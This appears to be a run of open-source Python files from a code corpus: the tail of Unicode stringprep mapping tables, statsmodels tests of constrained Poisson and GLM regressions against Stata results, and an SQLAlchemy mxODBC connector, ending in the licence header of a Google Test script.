0x1d541:u'j', 0x1d542:u'k', 0x1d543:u'l', 0x1d544:u'm',
0x1d546:u'o', 0x1d54a:u's', 0x1d54b:u't', 0x1d54c:u'u',
0x1d54d:u'v', 0x1d54e:u'w', 0x1d54f:u'x', 0x1d550:u'y',
0x1d56c:u'a', 0x1d56d:u'b', 0x1d56e:u'c', 0x1d56f:u'd',
0x1d570:u'e', 0x1d571:u'f', 0x1d572:u'g', 0x1d573:u'h',
0x1d574:u'i', 0x1d575:u'j', 0x1d576:u'k', 0x1d577:u'l',
0x1d578:u'm', 0x1d579:u'n', 0x1d57a:u'o', 0x1d57b:u'p',
0x1d57c:u'q', 0x1d57d:u'r', 0x1d57e:u's', 0x1d57f:u't',
0x1d580:u'u', 0x1d581:u'v', 0x1d582:u'w', 0x1d583:u'x',
0x1d584:u'y', 0x1d585:u'z', 0x1d5a0:u'a', 0x1d5a1:u'b',
0x1d5a2:u'c', 0x1d5a3:u'd', 0x1d5a4:u'e', 0x1d5a5:u'f',
0x1d5a6:u'g', 0x1d5a7:u'h', 0x1d5a8:u'i', 0x1d5a9:u'j',
0x1d5aa:u'k', 0x1d5ab:u'l', 0x1d5ac:u'm', 0x1d5ad:u'n',
0x1d5ae:u'o', 0x1d5af:u'p', 0x1d5b0:u'q', 0x1d5b1:u'r',
0x1d5b2:u's', 0x1d5b3:u't', 0x1d5b4:u'u', 0x1d5b5:u'v',
0x1d5b6:u'w', 0x1d5b7:u'x', 0x1d5b8:u'y', 0x1d5b9:u'z',
0x1d5d4:u'a', 0x1d5d5:u'b', 0x1d5d6:u'c', 0x1d5d7:u'd',
0x1d5d8:u'e', 0x1d5d9:u'f', 0x1d5da:u'g', 0x1d5db:u'h',
0x1d5dc:u'i', 0x1d5dd:u'j', 0x1d5de:u'k', 0x1d5df:u'l',
0x1d5e0:u'm', 0x1d5e1:u'n', 0x1d5e2:u'o', 0x1d5e3:u'p',
0x1d5e4:u'q', 0x1d5e5:u'r', 0x1d5e6:u's', 0x1d5e7:u't',
0x1d5e8:u'u', 0x1d5e9:u'v', 0x1d5ea:u'w', 0x1d5eb:u'x',
0x1d5ec:u'y', 0x1d5ed:u'z', 0x1d608:u'a', 0x1d609:u'b',
0x1d60a:u'c', 0x1d60b:u'd', 0x1d60c:u'e', 0x1d60d:u'f',
0x1d60e:u'g', 0x1d60f:u'h', 0x1d610:u'i', 0x1d611:u'j',
0x1d612:u'k', 0x1d613:u'l', 0x1d614:u'm', 0x1d615:u'n',
0x1d616:u'o', 0x1d617:u'p', 0x1d618:u'q', 0x1d619:u'r',
0x1d61a:u's', 0x1d61b:u't', 0x1d61c:u'u', 0x1d61d:u'v',
0x1d61e:u'w', 0x1d61f:u'x', 0x1d620:u'y', 0x1d621:u'z',
0x1d63c:u'a', 0x1d63d:u'b', 0x1d63e:u'c', 0x1d63f:u'd',
0x1d640:u'e', 0x1d641:u'f', 0x1d642:u'g', 0x1d643:u'h',
0x1d644:u'i', 0x1d645:u'j', 0x1d646:u'k', 0x1d647:u'l',
0x1d648:u'm', 0x1d649:u'n', 0x1d64a:u'o', 0x1d64b:u'p',
0x1d64c:u'q', 0x1d64d:u'r', 0x1d64e:u's', 0x1d64f:u't',
0x1d650:u'u', 0x1d651:u'v', 0x1d652:u'w', 0x1d653:u'x',
0x1d654:u'y', 0x1d655:u'z', 0x1d670:u'a', 0x1d671:u'b',
0x1d672:u'c', 0x1d673:u'd', 0x1d674:u'e', 0x1d675:u'f',
0x1d676:u'g', 0x1d677:u'h', 0x1d678:u'i', 0x1d679:u'j',
0x1d67a:u'k', 0x1d67b:u'l', 0x1d67c:u'm', 0x1d67d:u'n',
0x1d67e:u'o', 0x1d67f:u'p', 0x1d680:u'q', 0x1d681:u'r',
0x1d682:u's', 0x1d683:u't', 0x1d684:u'u', 0x1d685:u'v',
0x1d686:u'w', 0x1d687:u'x', 0x1d688:u'y', 0x1d689:u'z',
0x1d6a8:u'\u03b1', 0x1d6a9:u'\u03b2', 0x1d6aa:u'\u03b3', 0x1d6ab:u'\u03b4',
0x1d6ac:u'\u03b5', 0x1d6ad:u'\u03b6', 0x1d6ae:u'\u03b7', 0x1d6af:u'\u03b8',
0x1d6b0:u'\u03b9', 0x1d6b1:u'\u03ba', 0x1d6b2:u'\u03bb', 0x1d6b3:u'\u03bc',
0x1d6b4:u'\u03bd', 0x1d6b5:u'\u03be', 0x1d6b6:u'\u03bf', 0x1d6b7:u'\u03c0',
0x1d6b8:u'\u03c1', 0x1d6b9:u'\u03b8', 0x1d6ba:u'\u03c3', 0x1d6bb:u'\u03c4',
0x1d6bc:u'\u03c5', 0x1d6bd:u'\u03c6', 0x1d6be:u'\u03c7', 0x1d6bf:u'\u03c8',
0x1d6c0:u'\u03c9', 0x1d6d3:u'\u03c3', 0x1d6e2:u'\u03b1', 0x1d6e3:u'\u03b2',
0x1d6e4:u'\u03b3', 0x1d6e5:u'\u03b4', 0x1d6e6:u'\u03b5', 0x1d6e7:u'\u03b6',
0x1d6e8:u'\u03b7', 0x1d6e9:u'\u03b8', 0x1d6ea:u'\u03b9', 0x1d6eb:u'\u03ba',
0x1d6ec:u'\u03bb', 0x1d6ed:u'\u03bc', 0x1d6ee:u'\u03bd', 0x1d6ef:u'\u03be',
0x1d6f0:u'\u03bf', 0x1d6f1:u'\u03c0', 0x1d6f2:u'\u03c1', 0x1d6f3:u'\u03b8',
0x1d6f4:u'\u03c3', 0x1d6f5:u'\u03c4', 0x1d6f6:u'\u03c5', 0x1d6f7:u'\u03c6',
0x1d6f8:u'\u03c7', 0x1d6f9:u'\u03c8', 0x1d6fa:u'\u03c9', 0x1d70d:u'\u03c3',
0x1d71c:u'\u03b1', 0x1d71d:u'\u03b2', 0x1d71e:u'\u03b3', 0x1d71f:u'\u03b4',
0x1d720:u'\u03b5', 0x1d721:u'\u03b6', 0x1d722:u'\u03b7', 0x1d723:u'\u03b8',
0x1d724:u'\u03b9', 0x1d725:u'\u03ba', 0x1d726:u'\u03bb', 0x1d727:u'\u03bc',
0x1d728:u'\u03bd', 0x1d729:u'\u03be', 0x1d72a:u'\u03bf', 0x1d72b:u'\u03c0',
0x1d72c:u'\u03c1', 0x1d72d:u'\u03b8', 0x1d72e:u'\u03c3', 0x1d72f:u'\u03c4',
0x1d730:u'\u03c5', 0x1d731:u'\u03c6', 0x1d732:u'\u03c7', 0x1d733:u'\u03c8',
0x1d734:u'\u03c9', 0x1d747:u'\u03c3', 0x1d756:u'\u03b1', 0x1d757:u'\u03b2',
0x1d758:u'\u03b3', 0x1d759:u'\u03b4', 0x1d75a:u'\u03b5', 0x1d75b:u'\u03b6',
0x1d75c:u'\u03b7', 0x1d75d:u'\u03b8', 0x1d75e:u'\u03b9', 0x1d75f:u'\u03ba',
0x1d760:u'\u03bb', 0x1d761:u'\u03bc', 0x1d762:u'\u03bd', 0x1d763:u'\u03be',
0x1d764:u'\u03bf', 0x1d765:u'\u03c0', 0x1d766:u'\u03c1', 0x1d767:u'\u03b8',
0x1d768:u'\u03c3', 0x1d769:u'\u03c4', 0x1d76a:u'\u03c5', 0x1d76b:u'\u03c6',
0x1d76c:u'\u03c7', 0x1d76d:u'\u03c8', 0x1d76e:u'\u03c9', 0x1d781:u'\u03c3',
0x1d790:u'\u03b1', 0x1d791:u'\u03b2', 0x1d792:u'\u03b3', 0x1d793:u'\u03b4',
0x1d794:u'\u03b5', 0x1d795:u'\u03b6', 0x1d796:u'\u03b7', 0x1d797:u'\u03b8',
0x1d798:u'\u03b9', 0x1d799:u'\u03ba', 0x1d79a:u'\u03bb', 0x1d79b:u'\u03bc',
0x1d79c:u'\u03bd', 0x1d79d:u'\u03be', 0x1d79e:u'\u03bf', 0x1d79f:u'\u03c0',
0x1d7a0:u'\u03c1', 0x1d7a1:u'\u03b8', 0x1d7a2:u'\u03c3', 0x1d7a3:u'\u03c4',
0x1d7a4:u'\u03c5', 0x1d7a5:u'\u03c6', 0x1d7a6:u'\u03c7', 0x1d7a7:u'\u03c8',
0x1d7a8:u'\u03c9', 0x1d7bb:u'\u03c3', }
def map_table_b3(code):
r = b3_exceptions.get(ord(code))
if r is not None: return r
return code.lower()
def map_table_b2(a):
al = map_table_b3(a)
b = unicodedata.normalize("NFKC", al)
bl = u"".join([map_table_b3(ch) for ch in b])
c = unicodedata.normalize("NFKC", bl)
if b != c:
return c
else:
return al
def in_table_c11(code):
return code == u" "
def in_table_c12(code):
return unicodedata.category(code) == "Zs" and code != u" "
def in_table_c11_c12(code):
return unicodedata.category(code) == "Zs"
def in_table_c21(code):
return ord(code) < 128 and unicodedata.category(code) == "Cc"
c22_specials = set([1757, 1807, 6158, 8204, 8205, 8232, 8233, 65279] + range(8288,8292) + range(8298,8304) + range(65529,65533) + range(119155,119163))
def in_table_c22(code):
c = ord(code)
if c < 128: return False
if unicodedata.category(code) == "Cc": return True
return c in c22_specials
def in_table_c21_c22(code):
return unicodedata.category(code) == "Cc" or \
ord(code) in c22_specials
def in_table_c3(code):
return unicodedata.category(code) == "Co"
def in_table_c4(code):
c = ord(code)
if c < 0xFDD0: return False
if c < 0xFDF0: return True
return (ord(code) & 0xFFFF) in (0xFFFE, 0xFFFF)
def in_table_c5(code):
return unicodedata.category(code) == "Cs"
c6_set = set(range(65529,65534))
def in_table_c6(code):
return ord(code) in c6_set
c7_set = set(range(12272,12284))
def in_table_c7(code):
return ord(code) in c7_set
c8_set = set([832, 833, 8206, 8207] + range(8234,8239) + range(8298,8304))
def in_table_c8(code):
return ord(code) in c8_set
c9_set = set([917505] + range(917536,917632))
def in_table_c9(code):
return ord(code) in c9_set
def in_table_d1(code):
return unicodedata.bidirectional(code) in ("R","AL")
def in_table_d2(code):
return unicodedata.bidirectional(code) == "L"
| gpl-2.0 |
wkfwkf/statsmodels | statsmodels/discrete/tests/test_constrained.py | 26 | 19635 | # -*- coding: utf-8 -*-
"""
Created on Fri May 30 16:22:29 2014
Author: Josef Perktold
License: BSD-3
"""
from statsmodels.compat.python import StringIO
import numpy as np
from numpy.testing import assert_allclose, assert_equal, assert_
from nose import SkipTest
import pandas as pd
import patsy
from statsmodels.discrete.discrete_model import Poisson
from statsmodels.discrete.discrete_model import Logit
from statsmodels.genmod.generalized_linear_model import GLM
from statsmodels.genmod import families
from statsmodels.base._constraints import fit_constrained
from statsmodels.tools.tools import add_constant
from statsmodels import datasets
spector_data = datasets.spector.load()
spector_data.exog = add_constant(spector_data.exog, prepend=False)
from .results import results_poisson_constrained as results
from .results import results_glm_logit_constrained as reslogit
DEBUG = False
ss='''\
agecat smokes deaths pyears
1 1 32 52407
2 1 104 43248
3 1 206 28612
4 1 186 12663
5 1 102 5317
1 0 2 18790
2 0 12 10673
3 0 28 5710
4 0 28 2585
5 0 31 1462'''
data = pd.read_csv(StringIO(ss), delimiter='\t')
data['logpyears'] = np.log(data['pyears'])
class CheckPoissonConstrainedMixin(object):
def test_basic(self):
res1 = self.res1
res2 = self.res2
assert_allclose(res1[0], res2.params[self.idx], rtol=1e-6)
# see below Stata has nan, we have zero
bse1 = np.sqrt(np.diag(res1[1]))
mask = (bse1 == 0) & np.isnan(res2.bse[self.idx])
assert_allclose(bse1[~mask], res2.bse[self.idx][~mask], rtol=1e-6)
def test_basic_method(self):
if hasattr(self, 'res1m'):
res1 = (self.res1m if not hasattr(self.res1m, '_results')
else self.res1m._results)
res2 = self.res2
assert_allclose(res1.params, res2.params[self.idx], rtol=1e-6)
# when a parameter is fixed, the Stata has bse=nan, we have bse=0
mask = (res1.bse == 0) & np.isnan(res2.bse[self.idx])
assert_allclose(res1.bse[~mask], res2.bse[self.idx][~mask], rtol=1e-6)
tvalues = res2.params_table[self.idx, 2]
# when a parameter is fixed, the Stata has tvalue=nan, we have tvalue=inf
mask = np.isinf(res1.tvalues) & np.isnan(tvalues)
assert_allclose(res1.tvalues[~mask], tvalues[~mask], rtol=1e-6)
pvalues = res2.params_table[self.idx, 3]
# note most pvalues are very small
# examples so far agree at 8 or more decimal, but rtol is stricter
# see above
mask = (res1.pvalues == 0) & np.isnan(pvalues)
assert_allclose(res1.pvalues[~mask], pvalues[~mask], rtol=5e-5)
ci_low = res2.params_table[self.idx, 4]
ci_upp = res2.params_table[self.idx, 5]
ci = np.column_stack((ci_low, ci_upp))
# note most pvalues are very small
# examples so far agree at 8 or more decimal, but rtol is stricter
# see above: nan versus value
assert_allclose(res1.conf_int()[~np.isnan(ci)], ci[~np.isnan(ci)], rtol=5e-5)
#other
assert_allclose(res1.llf, res2.ll, rtol=1e-6)
assert_equal(res1.df_model, res2.df_m)
# Stata doesn't have df_resid
df_r = res2.N - res2.df_m - 1
assert_equal(res1.df_resid, df_r)
else:
raise SkipTest("not available yet")
def test_other(self):
# some results may not be valid or available for all models
if hasattr(self, 'res1m'):
res1 = self.res1m
res2 = self.res2
if hasattr(res2, 'll_0'):
assert_allclose(res1.llnull, res2.ll_0, rtol=1e-6)
else:
if DEBUG:
import warnings
message = ('test: ll_0 not available, llnull=%6.4F'
% res1.llnull)
warnings.warn(message)
else:
raise SkipTest("not available yet")
class TestPoissonConstrained1a(CheckPoissonConstrainedMixin):
@classmethod
def setup_class(cls):
cls.res2 = results.results_noexposure_constraint
cls.idx = [7, 3, 4, 5, 6, 0, 1] # 2 is dropped baseline for categorical
# example without offset
formula = 'deaths ~ logpyears + smokes + C(agecat)'
mod = Poisson.from_formula(formula, data=data)
#res1a = mod1a.fit()
# get start_params, example fails to converge on one py TravisCI
k_vars = len(mod.exog_names)
start_params = np.zeros(k_vars)
start_params[0] = np.log(mod.endog.mean())
# if we need it, this is desired params
p = np.array([-3.93478643, 1.37276214, 2.33077032, 2.71338891,
2.71338891, 0.57966535, 0.97254074])
constr = 'C(agecat)[T.4] = C(agecat)[T.5]'
lc = patsy.DesignInfo(mod.exog_names).linear_constraint(constr)
cls.res1 = fit_constrained(mod, lc.coefs, lc.constants,
start_params=start_params,
fit_kwds={'method': 'bfgs',
'disp': 0})
# TODO: Newton fails
# test method of Poisson, not monkey patched
cls.res1m = mod.fit_constrained(constr, start_params=start_params,
method='bfgs', disp=0)
def test_smoke(self):
# trailing text in summary, assumes it's the first extra string
#NOTE: see comment about convergence in llnull for self.res1m
summ = self.res1m.summary()
assert_('linear equality constraints' in summ.extra_txt)
summ = self.res1m.summary2()
assert_('linear equality constraints' in summ.extra_txt[0])
class TestPoissonConstrained1b(CheckPoissonConstrainedMixin):
@classmethod
def setup_class(cls):
cls.res2 = results.results_exposure_constraint
#cls.idx = [3, 4, 5, 6, 0, 1] # 2 is dropped baseline for categorical
cls.idx = [6, 2, 3, 4, 5, 0] # 2 is dropped baseline for categorical
# example without offset
formula = 'deaths ~ smokes + C(agecat)'
mod = Poisson.from_formula(formula, data=data,
exposure=data['pyears'].values)
#offset=np.log(data['pyears'].values))
#res1a = mod1a.fit()
constr = 'C(agecat)[T.4] = C(agecat)[T.5]'
lc = patsy.DesignInfo(mod.exog_names).linear_constraint(constr)
cls.res1 = fit_constrained(mod, lc.coefs, lc.constants,
fit_kwds={'method': 'newton',
'disp': 0})
cls.constraints = lc
# TODO: bfgs fails
# test method of Poisson, not monkey patched
cls.res1m = mod.fit_constrained(constr, method='newton',
disp=0)
class TestPoissonConstrained1c(CheckPoissonConstrainedMixin):
@classmethod
def setup_class(cls):
cls.res2 = results.results_exposure_constraint
#cls.idx = [3, 4, 5, 6, 0, 1] # 2 is dropped baseline for categorical
cls.idx = [6, 2, 3, 4, 5, 0] # 2 is dropped baseline for categorical
# example without offset
formula = 'deaths ~ smokes + C(agecat)'
mod = Poisson.from_formula(formula, data=data,
offset=np.log(data['pyears'].values))
#res1a = mod1a.fit()
constr = 'C(agecat)[T.4] = C(agecat)[T.5]'
lc = patsy.DesignInfo(mod.exog_names).linear_constraint(constr)
cls.res1 = fit_constrained(mod, lc.coefs, lc.constants,
fit_kwds={'method': 'newton',
'disp': 0})
cls.constraints = lc
# TODO: bfgs fails
# test method of Poisson, not monkey patched
cls.res1m = mod.fit_constrained(constr, method='newton', disp=0)
class TestPoissonNoConstrained(CheckPoissonConstrainedMixin):
@classmethod
def setup_class(cls):
cls.res2 = results.results_exposure_noconstraint
cls.idx = [6, 2, 3, 4, 5, 0] # 1 is dropped baseline for categorical
# example without offset
formula = 'deaths ~ smokes + C(agecat)'
mod = Poisson.from_formula(formula, data=data,
#exposure=data['pyears'].values)
offset=np.log(data['pyears'].values))
res1 = mod.fit(disp=0)._results
# res1 is duplicate check, so we can follow the same pattern
cls.res1 = (res1.params, res1.cov_params())
cls.res1m = res1
class TestPoissonConstrained2a(CheckPoissonConstrainedMixin):
@classmethod
def setup_class(cls):
cls.res2 = results.results_noexposure_constraint2
cls.idx = [7, 3, 4, 5, 6, 0, 1] # 2 is dropped baseline for categorical
# example without offset
formula = 'deaths ~ logpyears + smokes + C(agecat)'
mod = Poisson.from_formula(formula, data=data)
# get start_params, example fails to converge on one py TravisCI
k_vars = len(mod.exog_names)
start_params = np.zeros(k_vars)
start_params[0] = np.log(mod.endog.mean())
# if we need it, this is desired params
p = np.array([-9.43762015, 1.52762442, 2.74155711, 3.58730007,
4.08730007, 1.15987869, 0.12111539])
constr = 'C(agecat)[T.5] - C(agecat)[T.4] = 0.5'
lc = patsy.DesignInfo(mod.exog_names).linear_constraint(constr)
cls.res1 = fit_constrained(mod, lc.coefs, lc.constants,
start_params=start_params,
fit_kwds={'method': 'bfgs', 'disp': 0})
# TODO: Newton fails
# test method of Poisson, not monkey patched
cls.res1m = mod.fit_constrained(constr, start_params=start_params,
method='bfgs', disp=0)
class TestPoissonConstrained2b(CheckPoissonConstrainedMixin):
@classmethod
def setup_class(cls):
cls.res2 = results.results_exposure_constraint2
#cls.idx = [3, 4, 5, 6, 0, 1] # 2 is dropped baseline for categorical
cls.idx = [6, 2, 3, 4, 5, 0] # 2 is dropped baseline for categorical
# example without offset
formula = 'deaths ~ smokes + C(agecat)'
mod = Poisson.from_formula(formula, data=data,
exposure=data['pyears'].values)
#offset=np.log(data['pyears'].values))
#res1a = mod1a.fit()
constr = 'C(agecat)[T.5] - C(agecat)[T.4] = 0.5'
lc = patsy.DesignInfo(mod.exog_names).linear_constraint(constr)
cls.res1 = fit_constrained(mod, lc.coefs, lc.constants,
fit_kwds={'method': 'newton',
'disp': 0})
cls.constraints = lc
# TODO: bfgs fails to converge. overflow somewhere?
# test method of Poisson, not monkey patched
cls.res1m = mod.fit_constrained(constr, method='bfgs', disp=0,
start_params=cls.res1[0])
class TestPoissonConstrained2c(CheckPoissonConstrainedMixin):
@classmethod
def setup_class(cls):
cls.res2 = results.results_exposure_constraint2
#cls.idx = [3, 4, 5, 6, 0, 1] # 2 is dropped baseline for categorical
cls.idx = [6, 2, 3, 4, 5, 0] # 2 is dropped baseline for categorical
# example without offset
formula = 'deaths ~ smokes + C(agecat)'
mod = Poisson.from_formula(formula, data=data,
offset=np.log(data['pyears'].values))
constr = 'C(agecat)[T.5] - C(agecat)[T.4] = 0.5'
lc = patsy.DesignInfo(mod.exog_names).linear_constraint(constr)
cls.res1 = fit_constrained(mod, lc.coefs, lc.constants,
fit_kwds={'method':'newton',
'disp': 0})
cls.constraints = lc
# TODO: bfgs fails
# test method of Poisson, not monkey patched
cls.res1m = mod.fit_constrained(constr,
method='bfgs', disp=0,
start_params=cls.res1[0])
class TestGLMPoissonConstrained1a(CheckPoissonConstrainedMixin):
@classmethod
def setup_class(cls):
from statsmodels.base._constraints import fit_constrained
cls.res2 = results.results_noexposure_constraint
cls.idx = [7, 3, 4, 5, 6, 0, 1] # 2 is dropped baseline for categorical
# example without offset
formula = 'deaths ~ logpyears + smokes + C(agecat)'
mod = GLM.from_formula(formula, data=data,
family=families.Poisson())
constr = 'C(agecat)[T.4] = C(agecat)[T.5]'
lc = patsy.DesignInfo(mod.exog_names).linear_constraint(constr)
cls.res1 = fit_constrained(mod, lc.coefs, lc.constants)
cls.constraints = lc
cls.res1m = mod.fit_constrained(constr)
class TestGLMPoissonConstrained1b(CheckPoissonConstrainedMixin):
@classmethod
def setup_class(cls):
from statsmodels.genmod.generalized_linear_model import GLM
from statsmodels.genmod import families
from statsmodels.base._constraints import fit_constrained
cls.res2 = results.results_exposure_constraint
cls.idx = [6, 2, 3, 4, 5, 0] # 2 is dropped baseline for categorical
# example with offset
formula = 'deaths ~ smokes + C(agecat)'
mod = GLM.from_formula(formula, data=data,
family=families.Poisson(),
offset=np.log(data['pyears'].values))
constr = 'C(agecat)[T.4] = C(agecat)[T.5]'
lc = patsy.DesignInfo(mod.exog_names).linear_constraint(constr)
cls.res1 = fit_constrained(mod, lc.coefs, lc.constants)
cls.constraints = lc
cls.res1m = mod.fit_constrained(constr)._results
def test_compare_glm_poisson(self):
res1 = self.res1m
res2 = self.res2
formula = 'deaths ~ smokes + C(agecat)'
mod = Poisson.from_formula(formula, data=data,
exposure=data['pyears'].values)
#offset=np.log(data['pyears'].values))
constr = 'C(agecat)[T.4] = C(agecat)[T.5]'
res2 = mod.fit_constrained(constr, start_params=self.res1m.params,
method='newton', warn_convergence=False,
disp=0)
# we get high precision because we use the params as start_params
# basic, just as check that we have the same model
assert_allclose(res1.params, res2.params, rtol=1e-12)
assert_allclose(res1.bse, res2.bse, rtol=1e-12)
# check predict, fitted, ...
predicted = res1.predict()
assert_allclose(predicted, res2.predict(), rtol=1e-10)
assert_allclose(res1.mu, predicted, rtol=1e-10)
assert_allclose(res1.fittedvalues, predicted, rtol=1e-10)
assert_allclose(res2.predict(linear=True), res2.predict(linear=True),
rtol=1e-10)
class CheckGLMConstrainedMixin(CheckPoissonConstrainedMixin):
# add tests for some GLM specific attributes
def test_glm(self):
res2 = self.res2 # reference results
res1 = self.res1m
#assert_allclose(res1.aic, res2.aic, rtol=1e-10) # far away
# Stata aic in ereturn and in estat ic are very different
# we have the same as estat ic
# see issue #1733
assert_allclose(res1.aic, res2.infocrit[4], rtol=1e-10)
assert_allclose(res1.bic, res2.bic, rtol=1e-10)
# bic is deviance based
#assert_allclose(res1.bic, res2.infocrit[5], rtol=1e-10)
assert_allclose(res1.deviance, res2.deviance, rtol=1e-10)
# TODO: which chi2 are these
#assert_allclose(res1.pearson_chi2, res2.chi2, rtol=1e-10)
class TestGLMLogitConstrained1(CheckGLMConstrainedMixin):
@classmethod
def setup_class(cls):
cls.idx = slice(None)
# params sequence same as Stata, but Stata reports param = nan
# and we have param = value = 0
#res1ul = Logit(data.endog, data.exog).fit(method="newton", disp=0)
cls.res2 = reslogit.results_constraint1
mod1 = GLM(spector_data.endog, spector_data.exog,
family=families.Binomial())
constr = 'x1 = 2.8'
cls.res1m = mod1.fit_constrained(constr)
R, q = cls.res1m.constraints.coefs, cls.res1m.constraints.constants
cls.res1 = fit_constrained(mod1, R, q)
class TestGLMLogitConstrained2(CheckGLMConstrainedMixin):
@classmethod
def setup_class(cls):
cls.idx = slice(None) # params sequence same as Stata
#res1ul = Logit(data.endog, data.exog).fit(method="newton", disp=0)
cls.res2 = reslogit.results_constraint2
mod1 = GLM(spector_data.endog, spector_data.exog,
family=families.Binomial())
constr = 'x1 - x3 = 0'
cls.res1m = mod1.fit_constrained(constr)
R, q = cls.res1m.constraints.coefs, cls.res1m.constraints.constants
cls.res1 = fit_constrained(mod1, R, q)
cls.constraints_rq = (R, q)
def test_predict(self):
# results only available for this case
res2 = self.res2 # reference results
res1 = self.res1m
predicted = res1.predict()
assert_allclose(predicted, res2.predict_mu, atol=1e-7)
assert_allclose(res1.mu, predicted, rtol=1e-10)
assert_allclose(res1.fittedvalues, predicted, rtol=1e-10)
def test_smoke(self):
# trailing text in summary, assumes it's the first extra string
summ = self.res1m.summary()
assert_('linear equality constraints' in summ.extra_txt)
summ = self.res1m.summary2()
assert_('linear equality constraints' in summ.extra_txt[0])
def test_fit_constrained_wrap(self):
# minimal test
res2 = self.res2 # reference results
from statsmodels.base._constraints import fit_constrained_wrap
res_wrap = fit_constrained_wrap(self.res1m.model, self.constraints_rq)
assert_allclose(res_wrap.params, res2.params, rtol=1e-6)
assert_allclose(res_wrap.params, res2.params, rtol=1e-6)
def junk():
# Singular Matrix in mod1a.fit()
formula1 = 'deaths ~ smokes + C(agecat)'
formula2 = 'deaths ~ C(agecat) + C(smokes) : C(agecat)' # same as Stata default
mod = Poisson.from_formula(formula2, data=data, exposure=data['pyears'].values)
res0 = mod.fit()
constraints = 'C(smokes)[T.1]:C(agecat)[3] = C(smokes)[T.1]:C(agecat)[4]'
import patsy
lc = patsy.DesignInfo(mod.exog_names).linear_constraint(constraints)
R, q = lc.coefs, lc.constants
resc = mod.fit_constrained(R,q, fit_kwds={'method':'bfgs'})
# example without offset
formula1a = 'deaths ~ logpyears + smokes + C(agecat)'
mod1a = Poisson.from_formula(formula1a, data=data)
print(mod1a.exog.shape)
res1a = mod1a.fit()
lc_1a = patsy.DesignInfo(mod1a.exog_names).linear_constraint('C(agecat)[T.4] = C(agecat)[T.5]')
resc1a = mod1a.fit_constrained(lc_1a.coefs, lc_1a.constants, fit_kwds={'method':'newton'})
print(resc1a[0])
print(resc1a[1])
| bsd-3-clause |
olivierdalang/stdm | third_party/sqlalchemy/connectors/mxodbc.py | 1 | 5498 | # connectors/mxodbc.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
Provide an SQLALchemy connector for the eGenix mxODBC commercial
Python adapter for ODBC. This is not a free product, but eGenix
provides SQLAlchemy with a license for use in continuous integration
testing.
This has been tested for use with mxODBC 3.1.2 on SQL Server 2005
and 2008, using the SQL Server Native driver. However, it is
possible for this to be used on other database platforms.
For more info on mxODBC, see http://www.egenix.com/
"""
import sys
import re
import warnings
from . import Connector
class MxODBCConnector(Connector):
driver = 'mxodbc'
supports_sane_multi_rowcount = False
supports_unicode_statements = True
supports_unicode_binds = True
supports_native_decimal = True
@classmethod
def dbapi(cls):
# this classmethod will normally be replaced by an instance
# attribute of the same name, so this is normally only called once.
cls._load_mx_exceptions()
platform = sys.platform
if platform == 'win32':
from mx.ODBC import Windows as module
# this can be the string "linux2", and possibly others
elif 'linux' in platform:
from mx.ODBC import unixODBC as module
elif platform == 'darwin':
from mx.ODBC import iODBC as module
else:
raise ImportError("Unrecognized platform for mxODBC import")
return module
@classmethod
def _load_mx_exceptions(cls):
""" Import mxODBC exception classes into the module namespace,
as if they had been imported normally. This is done here
to avoid requiring all SQLAlchemy users to install mxODBC.
"""
global InterfaceError, ProgrammingError
from mx.ODBC import InterfaceError
from mx.ODBC import ProgrammingError
def on_connect(self):
def connect(conn):
conn.stringformat = self.dbapi.MIXED_STRINGFORMAT
conn.datetimeformat = self.dbapi.PYDATETIME_DATETIMEFORMAT
conn.decimalformat = self.dbapi.DECIMAL_DECIMALFORMAT
conn.errorhandler = self._error_handler()
return connect
def _error_handler(self):
""" Return a handler that adjusts mxODBC's raised Warnings to
emit Python standard warnings.
"""
from mx.ODBC.Error import Warning as MxOdbcWarning
def error_handler(connection, cursor, errorclass, errorvalue):
if issubclass(errorclass, MxOdbcWarning):
errorclass.__bases__ = (Warning,)
warnings.warn(message=str(errorvalue),
category=errorclass,
stacklevel=2)
else:
raise errorclass(errorvalue)
return error_handler
def create_connect_args(self, url):
""" Return a tuple of *args,**kwargs for creating a connection.
The mxODBC 3.x connection constructor looks like this:
connect(dsn, user='', password='',
clear_auto_commit=1, errorhandler=None)
This method translates the values in the provided uri
into args and kwargs needed to instantiate an mxODBC Connection.
The arg 'errorhandler' is not used by SQLAlchemy and will
not be populated.
"""
opts = url.translate_connect_args(username='user')
opts.update(url.query)
args = opts.pop('host')
opts.pop('port', None)
opts.pop('database', None)
return (args,), opts
def is_disconnect(self, e, connection, cursor):
# TODO: eGenix recommends checking connection.closed here
# Does that detect dropped connections ?
if isinstance(e, self.dbapi.ProgrammingError):
return "connection already closed" in str(e)
elif isinstance(e, self.dbapi.Error):
return '[08S01]' in str(e)
else:
return False
def _get_server_version_info(self, connection):
# eGenix suggests using conn.dbms_version instead
# of what we're doing here
dbapi_con = connection.connection
version = []
r = re.compile('[.\-]')
# 18 == pyodbc.SQL_DBMS_VER
for n in r.split(dbapi_con.getinfo(18)[1]):
try:
version.append(int(n))
except ValueError:
version.append(n)
return tuple(version)
def _get_direct(self, context):
if context:
native_odbc_execute = context.execution_options.\
get('native_odbc_execute', 'auto')
# default to direct=True in all cases, is more generally
# compatible especially with SQL Server
return False if native_odbc_execute is True else True
else:
return True
def do_executemany(self, cursor, statement, parameters, context=None):
cursor.executemany(
statement, parameters, direct=self._get_direct(context))
def do_execute(self, cursor, statement, parameters, context=None):
cursor.execute(statement, parameters, direct=self._get_direct(context))
| gpl-2.0 |
rowboat/external-gtest | test/gtest_filter_unittest.py | 21 | 17763 | #!/usr/bin/env python
#
# Copyright 2005, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
